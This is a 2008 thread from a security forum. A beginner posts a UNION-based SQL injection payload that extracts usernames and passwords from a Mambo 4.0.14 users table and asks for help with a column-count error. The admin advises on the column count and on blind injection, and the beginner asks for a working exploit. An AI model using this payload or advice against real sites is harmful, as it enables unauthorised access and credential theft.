 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 622
 Members: 0
 Total: 622
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
sql injection help |
|
 Posted: Sat Apr 05, 2008 9:57 pm |
 |
|
| complete_n00b |
| Beginner |
 |
| |
| Joined: Apr 06, 2008 |
| Posts: 2 |
|
|
|
 |
|
 |
|
hello to all. i am trying to play with mambo open source Version : 4.0.14 stable. maybe i found something because i get
| Code: | | Query failed with error: The used SELECT statements have a different number of columns |
but i am not experienced at all in sql so i wanted some help.
i am using this injection :
| Code: | | -999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/mos_users/* |
and i thought to try different column numbers in | Code: | | /union/**/select/**/1 |
but it didnt solved the problem.
please take in consideration that i am not an expert in sql and php so try to explain things as detailed as you can. thanks in advance. |
|
|
|
|
|
|
|
|
| Posted: Sat Apr 05, 2008 11:31 pm |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Last time i counted columns in mos_users the count was 13 ...
Problem can be moe difficult - there can be more than one sql query involved and they need different column counts! In this case solution is blind injection. Which is not easy to implement - you need specially crafted script or some kind of sql injector utility, because manual blind sql injection is very-very slow  |
|
|
|
|
|
thanks |
|
| Posted: Sun Apr 06, 2008 1:52 am |
|
|
| complete_n00b |
| Beginner |
|
| |
| Joined: Apr 06, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
| waraxe thanks for the fast response. can you suggest me any working sql injection for mambo open source version 4.0.14 ? the page is absolutely clear. i mean that there is no modules , components or plugins installed. Everything is the default mambo open source. i think that even later versions exploits will work. anyways thanks for your response. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
